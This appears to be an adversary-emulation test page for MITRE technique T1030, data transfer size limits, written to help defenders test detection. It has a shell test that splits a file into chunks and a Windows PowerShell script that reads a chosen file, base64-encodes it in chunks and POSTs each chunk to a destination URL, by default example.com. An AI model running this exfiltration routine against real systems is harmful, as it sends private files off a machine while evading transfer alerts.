An adversary may exfiltrate data in fixed size chunks instead of whole files or limit packet sizes below certain thresholds. This approach may be used to avoid triggering network data transfer threshold alerts.
Take a file/directory, split it into 5Mb chunks
Supported Platforms: macOS, Linux
auto_generated_guid: ab936c51-10f4-46ce-9144-e02137b2016a
| Name | Description | Type | Default Value | |——|————-|——|—————| | file_name | File name | path | T1030_urandom| | folder_path | Path where the test creates artifacts | path | /tmp/T1030|
1
sh
!1
2
cd #{folder_path}; split -b 5000000 #{file_name}
ls -l #{folder_path}
1
if [ -f #{folder_path}/safe_to_delete ]; then rm -rf #{folder_path}; fi;
1
sh
!1
if [ ! -f #{folder_path}/#{file_name} ]; then exit 1; else exit 0; fi;
1
if [ ! -d #{folder_path} ]; then mkdir -p #{folder_path}; touch #{folder_path}/safe_to_delete; fi; dd if=/dev/urandom of=#{folder_path}/#{file_name} bs=25000000 count=1
Simulate transferring data over a network in small chunks to evade detection.
Supported Platforms: Windows
auto_generated_guid: f0287b58-f4bc-40f6-87eb-692e126e7f8f
| Name | Description | Type | Default Value | |——|————-|——|—————| | source_file_path | Path to the source file to transfer. | path | [User specified]| | destination_url | URL of the destination server. | url | http://example.com| | chunk_size | Size of each data chunk (in KB). | integer | 1024|
1
powershell
!1
2
3
4
5
6
7
8
9
$file = [System.IO.File]::OpenRead(#{source_file_path})
$chunkSize = #{chunk_size} * 1KB
$buffer = New-Object Byte[] $chunkSize
while ($bytesRead = $file.Read($buffer, 0, $buffer.Length)) {
$encodedChunk = [Convert]::ToBase64String($buffer, 0, $bytesRead)
Invoke-WebRequest -Uri #{destination_url} -Method Post -Body $encodedChunk
}
$file.Close()